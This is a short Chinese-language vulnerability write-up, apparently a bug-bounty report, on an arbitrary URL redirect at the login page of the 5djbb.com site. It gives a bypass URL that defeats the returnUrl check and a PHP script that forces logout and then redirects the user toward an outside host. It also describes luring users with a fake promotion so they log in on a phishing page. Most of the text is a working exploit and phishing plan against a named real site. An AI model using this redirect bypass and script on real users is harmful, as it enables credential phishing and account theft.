金宝保登陆处存在任意Url跳转

漏洞挖掘

1、打开Url：https://www.5djbb.com/login?returnUrl=https://www.5djbb.com/site/index.html

2、因为这里是存在了验证的，但是不严谨，导致可以绕过，绕过的链接如下

https://www.5djbb.com/login?returnUrl=http://www.baidu.com/?https://www.5djbb.com/

3、因为这个是要在没有登陆的情况下才可以，那么要写一个简单的脚本发送给用户，然后利用社工说这网站某某某处有什么活动可以领取什么，让他点开登陆（就算是登陆了还要重新登陆的话普通用户也不会发现有什么异常~），脚本如下

<?php
header( "Location:http://www.5djbb.com/site/logout" ); // 退出的链接
header( "Location:https://www.5djbb.com/login.html?returnUrl=http://www.baidu.com/?https://shop.5djbb.com//member" ); // 然后跳转到www.baidu.com，假设这是一个模仿登陆的界面，那么就可以实现钓鱼
?>

4、然后打开脚本后会跳转到https://www.5djbb.com/login.html?returnUrl=http://www.baidu.com/?https://shop.5djbb.com//member，然后登陆一下